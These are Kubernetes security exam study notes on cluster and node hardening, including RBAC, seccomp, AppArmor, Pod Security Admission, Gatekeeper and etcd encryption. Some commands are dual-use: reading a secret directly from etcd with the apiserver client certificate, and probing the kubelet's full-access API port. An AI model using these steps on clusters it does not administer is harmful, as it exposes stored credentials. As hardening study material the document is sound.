  • Client certificates are used to communicate with servers
  • Server components used in Kubernetes and their certificates:
    • kube-api server: apiserver.crt, apiserver.key
    • etcd-server: etcdserver.crt, etcdserver.key
    • kubelet: kubelet.crt, kubelet.key
  • Client components used in kubernetes and their certificates:
    • user certificates
    • kube-scheduler: scheduler.crt, scheduler.key
    • kube-controller-manager: controller-manager.crt, controller-manager.key
    • kube-proxy: kubeproxy.crt, kubeproxy.key
  • To generate a self-signed certificate: openssl req -nodes -new -x509 -keyout my.key -out my.crt -subj "/CN=mysite.com"
  • To generate certificates, you can use openssl:
    • Create a new private key: openssl genrsa -out my.key 2048
    • Create a new certificate signing request: openssl req -new -key my.key -out my.csr -subj "/CN=ryan"
    • Sign the csr and generate the certificate or create a signing request with kube-api:
      • Sign and generate (requires the CA key/cert): openssl x509 -req -in my.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out my.crt
      • Create a CertificateSigningRequest with kube-api:
        # extract the base64 encoded values of the CSR:
        cat my.csr | base64 | tr -d '\n'
        
        # create a CertificateSigningRequest object with kube-api, provide the base64 encoded value
        .... see the docs (a sketch using kubectl follows this list)
        
  • kubeadm will automatically generate certificates for clusters that it creates
    • kubeadm generates certificates in the /etc/kubernetes/pki/ directory
  • To view the details of a certificate, use openssl: openssl x509 -in <path to crt> -text -noout
  • Once you have a private key, you can sign it using the CertificateSigningRequest object. The controller manager is responsible for signing these requests. You can then use the signed certificate values to authenticate to the Kube API server by placing the signed key, certificate, and ca in a kube config file (~/.kube/config)
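
  • A sketch of the CertificateSigningRequest flow referenced in the list above (the username ‘ryan’ and file names reuse the examples; signerName and usages follow the Kubernetes CSR docs):

```sh
cat <<EOF | kubectl apply -f -
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:
  name: ryan
spec:
  request: $(cat my.csr | base64 | tr -d '\n')
  signerName: kubernetes.io/kube-apiserver-client
  usages:
  - client auth
EOF
kubectl certificate approve ryan
kubectl get csr ryan -o jsonpath='{.status.certificate}' | base64 -d > my.crt
```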

kubelet Security

  • By default, the kubelet API accepts anonymous requests; these are treated as user system:anonymous in the system:unauthenticated group. This behavior can be changed by setting the --anonymous-auth flag (or authentication.anonymous.enabled in the kubelet config file) to false
  • kubelet ports
    • port 10250 on the machine running a kubelet process serves an API that allows full access
    • port 10255 on the machine running a kubelet process serves an unauthenticated, read-only API
  • kubelet supports 2 authentication mechanisms: bearer tokens and certificate-based authentication
  • You can find the location of the kubelet config file by looking at the process: ps aux |grep -i kubelet
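
  • Quick checks (the config file path shown is the kubeadm default):

    ps aux | grep -i kubelet                              # note the --config=... path
    grep -A3 -i anonymous /var/lib/kubelet/config.yaml    # authentication.anonymous.enabled should be false
    curl -sk https://localhost:10250/pods                 # should be rejected when anonymous auth is disabled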

Authorization

Roles and ClusterRoles

  • Roles and clusterroles define what a user or service account can do within a cluster
  • The kubernetes primitive role is namespaced, clusterrole is not

Role Bindings and Cluster Role Bindings

  • rolebinding and clusterrolebinding link a user or service account to a role
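
  • Imperative examples (namespace, names, and the service account are placeholders):

    kubectl create role pod-reader --verb=get,list,watch --resource=pods -n dev
    kubectl create rolebinding pod-reader-binding --role=pod-reader --serviceaccount=dev:app-sa -n dev
    kubectl create clusterrole node-reader --verb=get,list --resource=nodes
    kubectl create clusterrolebinding node-reader-binding --clusterrole=node-reader --user=ryan
    kubectl auth can-i list pods -n dev --as=system:serviceaccount:dev:app-sa   # should print "yes"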

3 System Hardening

Principle of Least Privilege

  • Ensure that people or bots only have access to what is needed, and nothing else.

Limit access to nodes

Managing Local Users and Groups

  • Commands to be aware of: id, who, last, groups, useradd, userdel, usermod, groupdel
  • Files to be aware of: /etc/passwd, /etc/shadow, /etc/group
  • Disable logins for users and set their login shell to /bin/nologin
  • Remove users from groups they do not need to belong to

Securing SSH

  • Set the following in sshd_config
PermitRootLogin no
PasswordAuthentication no

Using sudo

  • The /etc/sudoers file controls and configures the behavior of the sudo command. Each entry follows a structured syntax. Below is a breakdown of the fields and their meanings:
# Example Lines
# ----------------------------------
# User/Group       Host=Command(s)
admin             ALL=(ALL) NOPASSWD: ALL
%developers       ALL=(ALL) ALL
john              ALL=(ALL:ALL) /usr/bin/apt-get

# Field Breakdown

admin             ALL=(ALL) NOPASSWD: ALL
|                 |   |       |         |
|                 |   |       |         +---> Command(s): Commands the user/group can execute.
|                 |   |       +------------> Options: Modifiers like `NOPASSWD` (no password required).
|                 |   +--------------------> Runas: User/Group the command can be run as.
|                 +------------------------> Host: On which machine this rule applies (`ALL` for any).
+-----------------------------------------> User/Group: The user or group this rule applies to.

# Examples Explained

1. Allow `admin` to execute any command without a password:
   admin ALL=(ALL) NOPASSWD: ALL

Remove Unnecessary Packages

  • This one is self-explanatory. Don’t have unnecessary software installed on your nodes.

Restrict Kernel Modules

  • Kernel modules are ways of extending the kernel to enable it to understand new hardware. They are like device drivers.
  • modprobe allows you to load a kernel module
  • lsmod allows you to view all loaded modules
  • You can blacklist modules by adding a new entry to /etc/modprobe.d/blacklist.conf
    • The entry should be in the format blacklist <module name>
    • Example: echo "blacklist sctp" >> /etc/modprobe.d/blacklist.conf
  • You may need to reboot the system after disabling kernel modules or blacklisting them

Disable Open Ports

  • Use netstat -tunlp or ss -tunlp to list listening ports on a system
  • Stop the service associated with the open port or disable access with a firewall
    • Common firewalls you can use are iptables or ufw
      • Run ufw status to list the current status of the UFW firewall
      • Allow all traffic outbound: ufw default allow outgoing
      • Deny all incoming: ufw default deny incoming
      • Allow SSH from 172.16.154.24: ufw allow from 172.16.154.24 to any port 22 proto tcp

Tracing Syscalls

  • There are several ways to trace syscalls in Linux.

strace

  • strace is included with most Linux distributions.
  • To use strace, simply add it before the binary that you are running:
    strace touch /tmp/test
    
  • You can also attach strace to a running process like this:
    strace -p <PID>
    

AquaSec Tracee

  • tracee is an open source tool created by AquaSec
  • Uses eBPF (extended Berkeley Packet Filter) to trace syscalls on a system. eBPF runs programs directly within kernel space without loading any kernel modules. As a result, tools that use eBPF are more efficient and typically use fewer resources.
  • tracee can be run by using the binaries or as a container

Restricting Access to syscalls with seccomp

  • seccomp can be used to restrict a process’ access to syscalls. It allows access to the most commonly used syscalls, while restricting access to syscalls that can be considered dangerous.

  • To see if seccomp is enabled:

    grep -i seccomp /boot/config-$(uname -r)
    
  • seccomp can operate in 1 of 3 modes:

    • mode 0: disabled
    • mode 1: strict (blocks nearly all syscalls, except for 4)
    • mode 2: selectively filters syscalls
    • To see which mode the process is currently running in: grep -i seccomp /proc/1/status where ‘1’ is the PID of the process
  • seccomp profiles

    • Kubernetes can apply a default seccomp profile (RuntimeDefault, supplied by the container runtime), which can be more or less restrictive depending on your configuration
    • You can create custom profiles to fine-tune which syscalls seccomp blocks or allows within a container
    • Example seccomp profile for mode 1:
      {
        "defaultAction": "SCMP_ACT_ERRNO",
        "archMap": [
          { "architecture": "SCMP_ARCH_X86_64", "subArchitectures": [] }
        ],
        "syscalls": [
          {
            "names": ["read", "write", "exit", "sigreturn"],
            "action": "SCMP_ACT_ALLOW"
          }
        ]
      }
      
  • To apply a seccomp profile to a pod:

    apiVersion: v1
    kind: Pod
    metadata:
      name: audit-pod
      labels:
        app: audit-pod
    spec:
      securityContext:
        seccompProfile:
          type: Localhost
          localhostProfile: profiles/audit.json #this path is relative to default seccomp profile location (/var/lib/kubelet/seccomp)
      containers:
      - name: test-container
        image: hashicorp/http-echo:1.0
        args:
        - "-text=just made some syscalls!"
        securityContext:
          allowPrivilegeEscalation: false
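
  • The referenced profile must already exist on each node under the kubelet's seccomp root, which defaults to /var/lib/kubelet/seccomp. A quick sketch (audit-pod.yaml is assumed to contain the manifest above):

    # on the worker node
    sudo mkdir -p /var/lib/kubelet/seccomp/profiles
    sudo cp audit.json /var/lib/kubelet/seccomp/profiles/audit.json

    # apply the pod and confirm it starts; a profile that blocks required syscalls
    # typically shows up as a container that fails to start
    kubectl apply -f audit-pod.yaml
    kubectl get pod audit-pod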
    

Restrict access to file systems

AppArmor

  • AppArmor can be used to limit a container's access to resources on the host. Why do we need AppArmor if we already have traditional discretionary access controls (file system permissions, etc.)? With discretionary access control, a running process inherits the permissions of the user who started it, which is usually more permission than the process needs. AppArmor is a mandatory access control implementation that allows one to implement fine-grained controls over what a process can access or do on a system.

  • AppArmor runs as a daemon on Linux systems. You can check its status using systemctl: systemctl status apparmor

    • If apparmor-utils is installed, you can also use aa-status
  • To use AppArmor, the kernel module must also be loaded. To check: cat /sys/module/apparmor/parameters/enabled (Y = loaded)

  • AppArmor profiles define what a process can and cannot do and are stored in /etc/apparmor.d/. Profiles need to be copied to every worker node and loaded.

  • Every profile needs to be loaded into AppArmor before it can take effect

    • To view loaded profiles, run aa-status
  • To load a profile: apparmor_parser -r -W /path/to/profile

    • If apparmor-utils is installed, you can also use aa-enforce to load a profile
  • Profiles are loaded in ‘enforce’ mode by default. To change the mode to ‘complain’: apparmor_parser -C /path/to/profile

    • If apparmor-utils is installed, you can also use aa-complain to change the mode
  • To view loaded apparmor profiles:

      kubeadmin@kube-controlplane:~$ sudo cat /sys/kernel/security/apparmor/profiles
      cri-containerd.apparmor.d (enforce)
      wpcom (unconfined)
      wike (unconfined)
      vpnns (unconfined)
      vivaldi-bin (unconfined)
      virtiofsd (unconfined)
      rsyslogd (enforce)
      vdens (unconfined)
      uwsgi-core (unconfined)
      /usr/sbin/chronyd (enforce)
      /usr/lib/snapd/snap-confine (enforce)
      /usr/lib/snapd/snap-confine//mount-namespace-capture-helper (enforce)
      tcpdump (enforce)
      man_groff (enforce)
      man_filter (enforce)
      ....
    

    or:

      root@controlplane00:/etc/apparmor.d# aa-status
      apparmor module is loaded.
      33 profiles are loaded.
      12 profiles are in enforce mode.
         /home/rtn/tools/test.sh
         /usr/bin/man
         /usr/lib/NetworkManager/nm-dhcp-client.action
         /usr/lib/NetworkManager/nm-dhcp-helper
         /usr/lib/connman/scripts/dhclient-script
         /usr/sbin/chronyd
         /{,usr/}sbin/dhclient
         lsb_release
         man_filter
         man_groff
         nvidia_modprobe
         nvidia_modprobe//kmod
      21 profiles are in complain mode.
         avahi-daemon
         dnsmasq
         dnsmasq//libvirt_leaseshelper
         identd
         klogd
         mdnsd
         nmbd
         nscd
         php-fpm
         ping
         samba-bgqd
         samba-dcerpcd
         samba-rpcd
         samba-rpcd-classic
         samba-rpcd-spoolss
         smbd
         smbldap-useradd
         smbldap-useradd///etc/init.d/nscd
         syslog-ng
         syslogd
         traceroute
      0 profiles are in kill mode.
      0 profiles are in unconfined mode.
      4 processes have profiles defined.
      2 processes are in enforce mode.
         /usr/sbin/chronyd (704)
         /usr/sbin/chronyd (708)
      2 processes are in complain mode.
         /usr/sbin/avahi-daemon (587) avahi-daemon
         /usr/sbin/avahi-daemon (613) avahi-daemon
      0 processes are unconfined but have a profile defined.
      0 processes are in mixed mode.
      0 processes are in kill mode.
    
  • AppArmor defines profile modes that determine how the profile behaves:

    • Modes:
      • Enforced: Action is taken and the application is allowed/blocked from performing defined actions. Events are logged in syslog.
      • Complain: Events are logged but no action is taken
      • Unconfined: application can perform any task and no event is logged
  • AppArmor Tools

    • Can be used to generate apparmor profiles
    • To install: apt install -y apparmor-utils
    • Run aa-genprof to generate a profile: aa-genprof ./my-application
  • Before applying an AppArmor profile to a pod, you must ensure the container runtime supports AppArmor. You must also ensure AppArmor is installed on the worker node and that all necessary profiles are loaded.

  • To apply an AppArmor profile to a pod, you must add the following security profile (K8s 1.30+):

    securityContext:
      appArmorProfile:
        type: <profile_type>
        localhostProfile: <profile_name>
    
    • <profile_type> can be one of 3 values: Unconfined, RuntimeDefault, or Localhost
      • Unconfined means the container is not restricted by AppArmor
      • RuntimeDefault means the container will use the default AppArmor profile
      • Localhost means the container will use a custom profile
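
  • To confirm which profile a running container is actually confined by (pod name is a placeholder):

    kubectl exec <pod-name> -- cat /proc/1/attr/current   # e.g. "my-profile (enforce)" or "unconfined"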

Deep Dive into AppArmor Profiles

AppArmor profiles define security rules for specific applications, specifying what they can and cannot do. These profiles reside in /etc/apparmor.d/ and are loaded into the kernel to enforce security policies.

  • Each profile follows this structure:
profile <profile_name> <executable_path> {
    <rules>
}
  • Example profile, a profile for nano:
profile nano /usr/bin/nano {
    # Allow reading any file
    file,

    # Deny writing to system directories
    deny /etc/* rw,
}
  • Types of AppArmor rules:
    • File Access Rules:
          /home/user/data.txt r,      # Read-only access
          /etc/passwd rw,             # Read & write access
          /tmp/** rw,                 # Read & write access to everything under /tmp
      
    • Network Access Rules:
          network inet tcp,           # Allow TCP connections
          network inet udp,           # Allow UDP connections
          network inet dgram,         # Allow datagram connections
      
    • Capability Rules:
    deny capability sys_admin,       # Deny sys_admin capability
    deny capability sys_ptrace,      # Deny sys_ptrace capability
    

Linux Capabilities in Pods

  • For the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process’s credentials (usually: effective UID, effective GID, and supplementary group list).
  • Starting with Linux 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled. Capabilities are a per-thread attribute.
  • Capabilities control what a process can do
  • Some common capabilities
    • CAP_SYS_ADMIN
    • CAP_NET_ADMIN
    • CAP_NET_RAW
  • To view the capabilities of a process:
    • getcap - Check the capabilities of a binary - getcap <path to bin>
    • getpcaps - Check the capabilities of a process - getpcaps <pid>
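
  • A sketch of dropping and adding capabilities on a container and inspecting the result (image, pod name, and capability choices are illustrative):

```sh
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: cap-demo
spec:
  containers:
  - name: main
    image: busybox
    command: ["sleep", "3600"]
    securityContext:
      capabilities:
        drop: ["ALL"]
        add: ["NET_BIND_SERVICE"]
EOF
kubectl exec cap-demo -- grep -i cap /proc/1/status   # CapEff should now be a very small bitmask
```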

4 Minimize Microservice Vulnerabilities

Pod Security Admission

  • Replaced Pod Security Policies
  • Pod Security Admission controller enforces pod security standards on pods
  • All you need to do to opt into the PSA feature is to add a label with a specific format to a namespace. All pods in that namespace will have to follow the standards declared.
    • The label consists of three parts: a prefix, a mode, and a level
    • Example: pod-security.kubernetes.io/enforce=restricted
    • Prefix: pod-security.kubernetes.io
    • Mode: enforce, audit, or warn
      • Enforce: blocks pods that do not meet the PSS
      • Audit: logs violations to the audit log but does not block pod creation
      • Warn: logs violations as warnings on the console but does not block pod creation
    • Level: privileged, baseline, or restricted
      • Privileged: fully unrestricted
        • Allowed: everything
      • Baseline: some restrictions
        • Allowed: most things, except sharing host namespaces, hostPath volumes and hostPorts, and privileged pods
      • Restricted: most restrictions, following pod-hardening best practices
        • Disallowed: running as root, host namespaces and host networking, hostPath volumes, hostPorts, privilege escalation, and privileged pods. Pods must also set a seccomp profile (RuntimeDefault or Localhost) and drop all capabilities (NET_BIND_SERVICE may be added back).
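
  • Example of opting a namespace into a standard (namespace name is a placeholder):

    kubectl create namespace secure-apps
    kubectl label namespace secure-apps \
      pod-security.kubernetes.io/enforce=restricted \
      pod-security.kubernetes.io/warn=baseline
    kubectl -n secure-apps run web --image=nginx   # rejected, since a plain pod violates the restricted standard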

Security Contexts

  • Security contexts are used to control the security settings of a pod or container
  • Security contexts can be defined at the pod level or the container level. Settings defined at the container level will override identical settings defined at the pod level
  • Security contexts can be used to:
    • Run a pod as a specific user
    • Run a pod as a specific group
    • Run a pod with specific Linux capabilities
    • Run a pod with a read-only root filesystem
    • Run a pod with a specific SELinux context
    • Run a pod with a specific AppArmor profile
  • You can view the capabilities of a process by viewing the status file of the process and grepping for capabilities:
    rtn@worker02:~$ cat /proc/self/status |grep -i cap
    CapInh: 0000000000000000
    CapPrm: 0000000000000000
    CapEff: 0000000000000000
    CapBnd: 000001ffffffffff
    CapAmb: 0000000000000000
    

These values are encoded in hexadecimal. To decode them, use the capsh command:

    rtn@worker02:~$ sudo capsh --decode=000001ffffffffff
    0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
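
  • A sketch of pod-level vs container-level securityContext settings (values are illustrative):

```sh
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: sec-ctx-demo
spec:
  securityContext:              # pod level: applies to all containers
    runAsUser: 1000
    runAsGroup: 3000
    fsGroup: 2000
  containers:
  - name: main
    image: busybox
    command: ["sleep", "3600"]
    securityContext:            # container level: overrides matching pod-level fields
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
EOF
kubectl exec sec-ctx-demo -- id   # should show uid=1000 gid=3000 with group 2000
```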

Admission Controllers

  • Admission Controllers are used for automation within a cluster
  • Once a request to the KubeAPI server has been authenticated and then authorized, it is intercepted and handled by any applicable Admission Controllers
  • Example Admission Controllers:
    • ImagePolicyWebhook
      • You may see this one on the exam.
      • When enabled, the ImagePolicyWebhook admission controller contacts an external service (which you or someone else wrote, in whatever language you want; it just needs to accept and respond to HTTP requests) to decide whether an image may be used.
      • To enable, add ImagePolicyWebhook to the --enable-admission-plugins flag of the kube-api server
      • You must also supply an admission configuration file, which in turn references a kubeconfig-formatted file describing how to reach the webhook backend. Pass the path to this config to the kube-api server with --admission-control-config-file=<path to config file>. Note that this path is the path inside the kube-apiserver container, so you must mount the host path into the pod as a hostPath volume.
    • AlwaysPullImages
    • DefaultStorageClass
    • EventRateLimit
    • NamespaceExists
    • … and many more
  • Admission Controllers help make Kubernetes modular
  • To see which Admission Controllers are enabled:
    • you can either grep the kubeapi process: ps aux |grep -i kube-api | grep -i admission
    • or you can look at the manifest for the KubeAPI server (if the cluster was provisioned with KubeADM) grep admission -A10 /etc/kubernetes/manifests/kube-apiserver.yaml
    • or if the cluster was provisioned manually you can look at the systemd unit file for the kube-api server daemon
  • There are two types of admission controllers:
    • Mutating - can make changes to ‘autocorrect’
    • Validating - only validates configuration
    • Mutating are invoked first. Validating second.
  • The admission controller runs as a webhook server. It can run inside the cluster as a pod or outside the cluster on another server.
  • Some admission controllers require a configuration file to be passed to the kube-api server. This file is passed using the --admission-control-config-file flag.
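
  • To check what is currently enabled on a kubeadm cluster, and where the flags live (the admission config path below is an example):

    grep -E 'enable-admission-plugins|admission-control-config-file' /etc/kubernetes/manifests/kube-apiserver.yaml
    # example flag values (edit the static pod manifest; the kubelet restarts the apiserver automatically):
    #   --enable-admission-plugins=NodeRestriction,ImagePolicyWebhook
    #   --admission-control-config-file=/etc/kubernetes/admission/admission-config.yaml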

Open Policy Agent

  • OPA can be used for authorization. However, it is more likely to be used in the admission control phase.
  • OPA can be deployed as a daemonset on a node or as a pod
  • OPA policies use a language called rego

OPA in Kubernetes

GateKeeper

  • Gatekeeper Constraint Framework

    • Gatekeeper is a validating and mutating webhook that enforces CRD-based policies executed by Open Policy Agent, a policy engine for Cloud Native environments hosted by CNCF as a graduated project.
    • The framework that helps us implement what, where, and how we want to do something in Kubernetes
      • Example:
        • What: Add labels, etc.
        • Where: kube-system namespace
        • How: When a pod is created
  • To run Gatekeeper in Kubernetes, simply apply the manifests provided by OPA

  • The pods and other resources are created in the gatekeeper-system namespace

  • Constraint Templates

    • Before you can define a constraint, you must first define a ConstraintTemplate, which describes both the Rego that enforces the constraint and the schema of the constraint. The schema of the constraint allows an admin to fine-tune the behavior of a constraint, much like arguments to a function.

    • Here is an example constraint template that requires all labels described by the constraint to be present:

      ```
      apiVersion: templates.gatekeeper.sh/v1
      kind: ConstraintTemplate
      metadata:
        name: k8srequiredlabels
      spec:
        crd:
          spec:
            names:
              kind: K8sRequiredLabels
            validation:
              # Schema for the `parameters` field
              openAPIV3Schema:
                type: object
                properties:
                  labels:
                    type: array
                    items:
                      type: string
        targets:
          - target: admission.k8s.gatekeeper.sh
            rego: |
              package k8srequiredlabels
      
              violation[{"msg": msg, "details": {"missing_labels": missing}}] {
                provided := {label | input.review.object.metadata.labels[label]}
                required := {label | label := input.parameters.labels[_]}
                missing := required - provided
                count(missing) > 0
                msg := sprintf("you must provide labels: %v", [missing])
              }
      ```
      
  • Constraints

    • Constraints are then used to inform Gatekeeper that the admin wants a ConstraintTemplate to be enforced, and how. This constraint uses the K8sRequiredLabels constraint template above to make sure the gatekeeper label is defined on all namespaces:
        apiVersion: constraints.gatekeeper.sh/v1beta1
        kind: K8sRequiredLabels
        metadata:
          name: ns-must-have-gk
        spec:
          match:
            kinds:
              - apiGroups: [""]
                kinds: ["Namespace"]
          parameters:
            labels: ["gatekeeper"]
      
    • The match field supports multiple options: https://open-policy-agent.github.io/gatekeeper/website/docs/howto#the-match-field
  • After creating the constraint from the constrainttemplate, you can view all violations by describing the constraint:

    • Example: kubectl describe k8srequiredlabels ns-must-have-gk

Kubernetes Secrets

  • Secrets are used to store sensitive information in Kubernetes
  • base64 encoded when stored in etcd
  • Can be injected into a pod as an env or mounted as a volume
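
  • Quick examples (names and values are placeholders; the jsonpath decode shows that base64 is encoding, not encryption):

    kubectl create secret generic db-creds --from-literal=username=admin --from-literal=password=S3cret
    kubectl get secret db-creds -o jsonpath='{.data.password}' | base64 -d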

Encrypting etcd

  • By default, the API server stores plain-text representations of resources into etcd, with no at-rest encryption.

  • The kube-apiserver process accepts an argument –encryption-provider-config that specifies a path to a configuration file. The contents of that file, if you specify one, control how Kubernetes API data is encrypted in etcd.

  • If you are running the kube-apiserver without the –encryption-provider-config command line argument, you do not have encryption at rest enabled. If you are running the kube-apiserver with the –encryption-provider-config command line argument, and the file that it references specifies the identity provider as the first encryption provider in the list, then you do not have at-rest encryption enabled (the default identity provider does not provide any confidentiality protection.)

  • If you are running the kube-apiserver with the –encryption-provider-config command line argument, and the file that it references specifies a provider other than identity as the first encryption provider in the list, then you already have at-rest encryption enabled. However, that check does not tell you whether a previous migration to encrypted storage has succeeded.

  • Example EncryptionConfiguration:

      apiVersion: apiserver.config.k8s.io/v1
      kind: EncryptionConfiguration
      resources:
        - resources:
            - secrets
            - configmaps
            - pandas.awesome.bears.example # a custom resource API
          providers:
            # This configuration does not provide data confidentiality. The first
            # configured provider is specifying the "identity" mechanism, which
            # stores resources as plain text.
            #
            - identity: {} # plain text, in other words NO encryption
            - aesgcm:
                keys:
                  - name: key1
                    secret: c2VjcmV0IGlzIHNlY3VyZQ==
                  - name: key2
                    secret: dGhpcyBpcyBwYXNzd29yZA==
            - aescbc:
                keys:
                  - name: key1
                    secret: c2VjcmV0IGlzIHNlY3VyZQ==
                  - name: key2
                    secret: dGhpcyBpcyBwYXNzd29yZA==
            - secretbox:
                keys:
                  - name: key1
                    secret: YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXoxMjM0NTY=
        - resources:
            - events
          providers:
            - identity: {} # do not encrypt Events even though *.* is specified below
        - resources:
            - '*.apps' # wildcard match requires Kubernetes 1.27 or later
          providers:
            - aescbc:
                keys:
                - name: key2
                  secret: c2VjcmV0IGlzIHNlY3VyZSwgb3IgaXMgaXQ/Cg==
        - resources:
            - '*.*' # wildcard match requires Kubernetes 1.27 or later
          providers:
            - aescbc:
                keys:
                - name: key3
                  secret: c2VjcmV0IGlzIHNlY3VyZSwgSSB0aGluaw==
    
  • Each resources array item is a separate config and contains a complete configuration. The resources.resources field is an array of Kubernetes resource names (resource or resource.group) that should be encrypted like Secrets, ConfigMaps, or other resources.

  • https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/

  • After enabling encryption in etcd, any secrets that you created prior to enabling encryption will not be encrypted. You can encrypt them by running:

kubectl get secrets -A -o yaml | kubectl replace -f -
  • Example of getting a secret in etcd:
ETCDCTL_API=3 etcdctl --cacert=/etc/kubernetes/pki/etcd/ca.crt --cert=/etc/kubernetes/pki/apiserver-etcd-client.crt --key=/etc/kubernetes/pki/apiserver-etcd-client.key get /registry/secrets/three/con1

The path to a resource in the etcd database is /registry/<resource type>/<namespace>/<resource name> (as in the example above).
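
  • To enable the configuration, pass the file to the kube-apiserver and mount it into the static pod. A minimal sketch (file locations below are assumptions; adjust to your cluster):

      # excerpt from /etc/kubernetes/manifests/kube-apiserver.yaml
      spec:
        containers:
        - command:
          - kube-apiserver
          - --encryption-provider-config=/etc/kubernetes/enc/enc.yaml
          # ...existing flags...
          volumeMounts:
          - name: enc
            mountPath: /etc/kubernetes/enc
            readOnly: true
        volumes:
        - name: enc
          hostPath:
            path: /etc/kubernetes/enc
            type: DirectoryOrCreate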

Container Sandboxing

  • Containers are not contained!
  • A container sandbox is a mechanism that provides an additional layer of isolation between the container and the host
  • Container sandboxing is implemented via RuntimeClass objects in Kubernetes.
  • The default container runtime handler is runc. However, we can change this to use runsc (gVisor) or Kata Containers
  • Sandboxing helps mitigate kernel exploits such as Dirty COW, which allowed an unprivileged user to escalate to root on the host
    • Dirty COW works by exploiting a race condition in the Linux kernel

gVisor

  • gVisor is an application kernel, written in Go, that intercepts system calls made by a container
  • gVisor is like a ‘syscall proxy’ that sits between the container and the host kernel
    • components
      • sentry - the application kernel that intercepts and services the container’s system calls
      • gofer - a per-container process that mediates the container’s access to the host filesystem
  • Not all apps will work with gVisor
  • gVisor will cause some performance degradation in your app due to the overhead of intercepting and handling system calls
  • gVisor uses runsc as the runtime handler

Kata Containers

  • Kata inserts each container into its own lightweight virtual machine, giving each its own kernel
  • Kata Containers require nested virtualization support, so they may not work with all cloud providers

RuntimeClass

  • RuntimeClass is a Kubernetes feature that allows you to select the container runtime configuration used to run a pod’s containers

To use a runtime class

  • Create a new RuntimeClass object:

    apiVersion: node.k8s.io/v1
    kind: RuntimeClass
    metadata:
      name: secure-runtime
    handler: runsc
    
  • Specify the runtimeClassName in the pod definition:

    apiVersion: v1
    kind: Pod
    metadata:
        name: simple-webapp-1
        labels:
            name: simple-webapp
    spec:
        runtimeClassName: secure-runtime
        containers:
        - name: simple-webapp
          image: kodekloud/webapp-delayed-start
          ports:
          - containerPort: 8080
    
    

Resource Quotas

  • Control requests and limits for CPU and memory within a namespace
apiVersion: v1
kind: ResourceQuota
metadata:
  name: team-a-resource-quota
  namespace: team-a
spec:
  hard:
    pods: "5"
    requests.cpu: "0.5"
    requests.memory: 500Mi
    limits.cpu: "1"
    limits.memory: 1Gi
---
apiVersion: v1
kind: ResourceQuota
metadata:
  name: pods-medium
spec:
  hard:
    cpu: "10"
    memory: 20Gi
    pods: "10"
  scopeSelector:
    matchExpressions:
    - operator: In
      scopeName: PriorityClass
      values: ["medium"]

API Priority and Fairness

  • https://kubernetes.io/docs/concepts/cluster-administration/flow-control/
  • With API Priority and Fairness, you can define which resources need to be prioritized over others in regards to requests to the KubeAPI server
  • To configure API Priority and Fairness, you create FlowSchema and PriorityLevelConfiguration objects. The feature is enabled by default, and the flowcontrol.apiserver.k8s.io API graduated to v1 in Kubernetes 1.29.
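    • A sketch of the two objects (field names per the flowcontrol.apiserver.k8s.io/v1 API; the names and values are examples, verify against the linked docs before relying on them):

      apiVersion: flowcontrol.apiserver.k8s.io/v1
      kind: PriorityLevelConfiguration
      metadata:
        name: example-priority-level
      spec:
        type: Limited
        limited:
          nominalConcurrencyShares: 10
          limitResponse:
            type: Reject
      ---
      apiVersion: flowcontrol.apiserver.k8s.io/v1
      kind: FlowSchema
      metadata:
        name: example-flowschema
      spec:
        priorityLevelConfiguration:
          name: example-priority-level
        matchingPrecedence: 1000
        distinguisherMethod:
          type: ByUser
        rules:
        - subjects:
          - kind: ServiceAccount
            serviceAccount:
              name: example-sa
              namespace: default
          resourceRules:
          - verbs: ["*"]
            apiGroups: ["*"]
            resources: ["*"]
            namespaces: ["*"]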
    

Pod Priority and Preemption

  • With Pod Priority and Preemption, you can ensure that critical pods keep running while the cluster is under resource contention by evicting (preempting) lower-priority pods
  • To implement Pod Priority and Preemption:
    • Create a priorityClass object (or several):
      apiVersion: scheduling.k8s.io/v1
      kind: PriorityClass
      metadata:
        name: high-priority
      value: 1000000
      globalDefault: false
      description: "This priority class should be used for XYZ service pods only."
      ---
      apiVersion: scheduling.k8s.io/v1
      kind: PriorityClass
      metadata:
        name: low-priority
      value: 100
      globalDefault: false
      description: "This priority class is for non-critical pods."
      
    • Assign the priorityClass to a pod:
      apiVersion: v1
      kind: Pod
      metadata:
        name: nginx
        labels:
          env: test
      spec:
        containers:
        - name: nginx
          image: nginx
          imagePullPolicy: IfNotPresent
        priorityClassName: high-priority
      

Pod to Pod Encryption

  • mTLS can be used to encrypt traffic between pods
  • Methods of p2p encryption
    • Service Mesh
      • Service Mesh can offload the encryption and decryption of traffic between pods by using a sidecar proxy
      • Examples:
        • Istio
          • Istio uses Envoy as a sidecar proxy to handle mTLS encryption of traffic between pods
        • Linkerd
    • Wireguard
      • Cilium
        • uses eBPF for network security
        • Encryption is transparent to the application
        • Provides flexible encryption options
    • IPSec
      • Calico

5 Supply Chain Security

SBOM

  • Supply chain security is the practice of ensuring that the software and hardware that you use in your environment is secure
  • In the context of the CKS exam, supply chain security refers to the security of the software that you use in your Kubernetes environment

Reduce docker image size

  • Smaller images are faster to download and deploy

  • Smaller images are more secure because they contain fewer packages and thus a smaller attack surface

  • Smaller images are easier to manage

  • To reduce the size of a docker image:

    • Use a smaller base image
    • Use specific package/image versions
    • Make file-system read-only
    • Don’t run the container as root
